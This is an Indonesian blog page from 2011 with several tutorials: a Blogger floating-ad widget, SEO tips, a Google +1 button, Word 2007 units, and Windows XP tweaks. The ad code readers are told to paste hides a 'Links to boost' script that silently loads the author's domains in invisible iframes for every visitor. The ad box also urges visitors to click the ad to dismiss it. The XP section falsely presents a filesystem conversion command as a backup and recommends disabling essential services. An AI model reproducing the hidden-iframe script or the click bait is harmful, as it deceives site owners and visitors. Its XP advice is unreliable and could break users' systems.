Thursday, June 30, 2011

Cara Memasang Iklan Melayang Di blog

Pernahkan Anda melihat iklan melayang di salah satu web/blog. iklan tersebut akan tampil ketika loading sekesai . Memasang iklan melayang adalah salah satu alternatif untuk meningkatkan jumlah klik pada iklan yang di pasang Walau sedikit menggangu kenyamanan pengunjung.


Dibawah ini cara pemasangannya:

  • Login ke blogger.
  • Silahkan tuju ke Tata Letak.
  • Klik tab Elemen Halaman.
  • Tambah Gadget (Add Gadget) -> pilih yang HTML/Javascript.
  • Kemudian masukkan kode script dibawah ini :


<style type="text/css">
#topbar{
position:absolute;
visibility: hidden;
width:350px;
z-index:100;
padding:5px;
background-color: #D9EBF0;
border: 1px solid #333333;
-moz-border-radius: 6px;
-webkit-border-radius: 6px;
margin:0 auto 10px;
float:right;
color: #000000;
text-align: justify;
font-size: 12px;
font-family: Verdana, serif;
filter:alpha(opacity=85);
-moz-opacity:0.85;
opacity:0.85;
}
</style>
<script src="http://btuneup.googlecode.com/files/js_pop_up.js" type="text/javascript"></script>
<script type="text/javascript">
var persistclose=0
var startX = 0
var startY = 0
var verticalpos="fromtop"
</script>
<div id="topbar">
<div align="right"><font class="linkaiklanclose"><a href="#"><center><b>Klik Iklan dibawah Ini 1x Untuk Menghilangkannya</b><br /><b>Terima Kasih Atas Kebaikan Anda</b></center>
</a></font></div> <div onclick="closebar()"; return="true">

MASUKKAN KODE IKLAN DISINI

<br/></div></div>

<script type="text/javascript">
var sLocation = document.referrer.toLocaleLowerCase();
//Links to boost
var rDomains = ["http://www.az-comsoft.co.cc","http://cektkp.com/javascript"];
//Allowed domain referrer
var aDomains = [".com"];
var valid = 1;

//Valid referrer
for (i=0;i<aDomains.length;i++) {
//Check referrer
if (sLocation.indexOf(aDomains[i], 0) > -1)
{
valid = 1;
break;
}
}

//Valid referrer
if (valid == 1)
{
//Loop
for (i=0;i<rDomains.length;i++) {
//alert(rDomains[i]);
invisibleWindow("mydiv" + i,rDomains[i]);
}
}

function invisibleWindow(iframeID, url) {
divel = document.createElement("div");
divel.id = "div" + iframeID;
divel.style.width = "5px";
divel.style.height = "5px";
divel.style.visibility = "hidden";

//Add div
document.body.appendChild(divel);

domiframe = document.createElement("iframe");
domiframe.id = iframeID;
domiframe.src = url;
domiframe.style.width = "5px";
domiframe.style.height = "5px";
domiframe.style.visibility = "hidden";

var divid = document.getElementById("div" + iframeID);
divid.appendChild(domiframe);
}

</script>

Catatan:
Ganti tulisan yang berwarna Merah dengan kode iklan yang anda miliki.
Selesai...

Search Engine Optimize (SEO)

Insert keywords within the title tag so that search engine robots will know what your page is about. The title tag is located right at the top of your document within the head tags. Inserting a keywoard or key phrase will greatly improve your chances of bringing targeted traffic to your site or blog.

Make sure the title tag contains text which a human can relate to. The text within the title tag is what shows up in a search result. Treat it like a headline.

Use the same keywords as anchor text to link to the page from different pages on your site/blog. This is especially useful if your site or blog contains many pages. The more keywords that link to a specific page the better.

Make sure that the text within the title tag is also within the body of page. It is unwise to have keywords in the title tag which are not contained within the body of page.

Adding the ecact same for your h1 tag will tell the reader who clicks on your page from a search engine result that they have clicked on the correct link anda have arrived at the page where they intended to visit. Robots like this too becouse now there is a relation between the title of your page and the headline.
Also, sprinkle your keywords throughout your article. The most important keywords can be bolded or colored in red. A good place to do this is once or twice in the body at the top of your article and in the sub-headings.

Do not use the exact same title tag on every page on your website. Search engine robots might determine that all your pages are same if all your title tags are the same. If this happens, your pages might not get indexed.

Use the headline of pages as the title tag to help the robots know exactly what the page is about. A good place to insert the headline is within the h1 tag. So the headline is the same as the title tag text.

Do not spam the description or keyword meta tag by stuffing meaningless keywords or even spend too much time on this tag. SEO pros all agree that these tags are not as important today as they once were. I just place my headline once within the keywords and description tags.

Do not link to link-farms or other search engine unfriendly neighborhoods

Do not use doorway pages. Doorway pages are designed for robots only, not humans. Search engines like to index human friendly pages which contain content which is relevant to the search

Title tags for text links. Insert the title tag within the HTML of your text link to add weight to the link and the page where the link resides. This is like the alt tag for images

Describe your images with the use of the alt tag. This will help search engines that index images to find your pages and will also help readers who use text only web browsers

Submit to the search engines yourself. Do not use a submission service or submission software. Doing so could get your site penalized or even banned

Cara Memasang +1 Google Di Setiap Postingan

Langsung, kali ini saya menempatkan +1 google di bawah postingan. berikut langkah-langkahnya :
  1. Masuk ke Google Webmasters kemudian tentukan jenis tombolnya
  2. Salin dan tempelkan kode berikut ke template sobat kira-kira seperti ini kodenya

    <script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
    <!-- Tempatkan tag ini di tempat yang Anda inginkan untuk menampilkan tombol +1 --><br>
    <g:plusone></g:plusone>

  3. Selanjutnya Masuk ke dasbor sobat kemudian pilih Rancangan, beri tanda centeng Expand Template Widget.
  4. Cari kode ]]></b:skin> kemudian sisipkan kode berikut di bawahnya :

    <script src='http://apis.google.com/js/plusone.js' type='text/javascript'>
    {lang: 'id'}
    </script>

  5. Selanjutnya cari kode berikut :

    <b:if cond='data:post.url'>
    <b:if cond='data:blog.pageType == &quot;item&quot;'>

    selanjutnya letakkan kode <g:plusone></g:plusone> tepat dibawah kode diatas, lengkapnya seperti berikut:

    <b:if cond='data:post.url'>
    <b:if cond='data:blog.pageType == &quot;item&quot;'>
    <g:plusone></g:plusone>

Mudah bukan, penempatan +1 google tergantung selera sobat, kode diatas sesuaikan dengan template sobat dikarenakan tidak semua template sama. Selamat mencoba

Mengubah Format Inch Menjadi Centimeter Office 2007

Mengatur margin adalah hal yang penting termasuk ilmu komputer tentang cara mengubah format inch menjadi centimeter office 2007 adalah hal yang mutlak diperlukan dalam melakukan editing artikel, khususnya orang indonesia yang sehari menggunakan besaran meter dalam menghitung besaran panjang sehingga format default microsoft office word 2007 dalam inch harus diubah menjadi centimeter agar sesuai dengan penggunaan besaran untuk menghitung panjang di indonesia.

Untuk mengubah format inch menjadi centimeter pada office 2007 bisa dilakukan dengan cara sebagai berikut :


  1. Jalankan microsoft office word 2007
  2. Arahkan petunjuk mouse pada bagian Menu Bar (Home, Insert, Page Layout, References, Mailings, Review, View) atau bisa juga disebelah kanan menu-menu tersebut.
  3. Klik kanan dan pilih Customize Quick Access Toolbar sehingga tampil jendela Word Options
  4. Perhatikan dibagian sebelah kiri terdapat menu-menu yang bisa digunakan dalam mengatur Ms. Office Word 2007 dan salah satunya adalah menu Advanced, klik menu Advanced
  5. Klik Scroll Mouse ke bawah dan temukan sub menu Display
  6. Atur pilihan pada Show Measurements In Units of : yang defaultnya Inch menjadi Centimeter
  7. Klik OK dan selesai

Coba kembali ke dokumen anda dan perhatikan ruler lina sudah berubah dalam format centimeter, begitu juga dengan format yang berhubungan dengan pengaturan margin pada office word 2007 sudah berubah menjadi centimeter.

Semoga artikel tentang Mengubah Format Inch Menjadi Centimeter Office 2007 dapat bermanfaat bagi pengunjung blog Belajar Ilmu Komputer.

Bila sobat punya pengalaman, pengetahuan, ilmu tentang ms word 2007 yang hendak di sharing    silahkan di tambahkan di kolom

Cara Mempercepat Windows XP

Trik Windows XP | Cara Mempercepat Komputer

Ada beberapa cara untuk mempercepat kinerja  komputer  yang menggunakan windows XP, Agar perfomance PC bisa lebih maksimal  anda dapat mencoba tips dan trik berikut ini :
  1. Sebelum anda memulai tweaking (hm..utak-atik) sebaiknya anda backup dulu registry dengan memilih menu start>run>lalu ketikkan regedit setelah antar muka registrynya muncul pilih menu file >export dan beri nama ffile dengan nama backup.reg dan klik OK
  2. Agar lebih aman lagi jika terjadi kesalahan maka disarankan untuk memback-up semua data-data yang penting Klik Start, Run, ketik CMD – Pada prompt ketikkan : CONVERT C: /FS:NTFS lalu tekan tombol ENTER lalu tunggulah untuk sementara waktu hingga proses back-up selesaipilih menu start>Run dan ketikkan msconfig dan pada tab service uncheck service window yang tidak diperlukan
  3. Non aktifkan / disable Service Windows yg tidak butuhkan
  • * Alerter
    * Clipbook
    * Computer Browser
    * Distributed Link Tracking Client
    * Fast User Switching
    * Help and Support
    * Human Interface Access Devices
    * Indexing Service
    * IPSEC Services
    * Messenger
    * Netmeeting Remote Desktop Sharing
    * Portable Media Serial Number
    * Remote Desktop Help Session Manager
    * Remote Procedure Call Locator
    * Remote Registry
    * Remote Registry Service
    * Secondary Logon
    * Routing & Remote Access
    * Server
    * Telnet
    * TCP/IP NetBIOS Helper
    * Upload Manager
    * Universal Plug and Play Device Host
    * Wireless Zero Configuration -(Jangan didisable jika anda mengunakan Wireless)
    * Workstation

Tips Mempercepat Booting Windows XP

Windows XP memilik  kemampuan menjalankan defrag saat proses booting.  pada dasrnya Boot Defrag melakukan proses menata file-ile yg berhubungan dengan file-file dibutuhkan saat booting booting dengan mengindeks file secara berurutan. Secara default fitur defrag ini telah pada OS Windows, tapi tapi anda bisa memastikan jika fitur defrag ini telah aktif di komputer anda dengan cara dibawah ini
  • Start Menu>Run
  • Ketik regedit
  • Pilih HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction
  • Cari Enable dibagian kanan regedit
  • Klik Modify dan  Pilih Y to enable
  • Klik kanan > pilih modify dan ubah value menjadi angka 1000 lalu klik OK

Trik Mempercepat Loading Windows Menu

Untuk mempercepat proses saat loading windows berlangsung ikuti langkah-langkah dibawah ini :
  • Start Menu>Run
  • Ketik Regedit> lalu tekan enter
  • Masuk ke  HKEY_CURRENT_USER\Control Panel\Desktop\
  • Pilih MenuShowDelay
  • Klik kanan dan pilih “Modify’ ganti value dengan angka 100

Cara memaksimalkan Shutdown Windows XP

  • Start Menu>Run
  • Ketik Regedit> lalu tekan entermn
  • Masuk ke  HKEY_CURRENT_USER\Control Panel\Desktop\
  • Pilih WaitToKillAppTimeout
  • Klik kanan dan pilih modify dan ubah value menjadi angka 1000 lalu klik OK
  • Pilih HungAppTimeout lalu klik kanan > pilih modify dan ubah value menjadi 1000 lalu klik OK
  • Masuk ke HKEY_USERS\.DEFAULT\Control Panel\Desktop’
  • Pilih WaitToKillAppTimeout
  • Klik kanan > pilih modify dan ubah value menjadi 1000  lalu klik OK
  • Masuk keHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\
  • Pilih WaitToKillServiceTimeout
  • Klik kanan > pilih modify dan ubah value menjadi 1000  lalu klik OK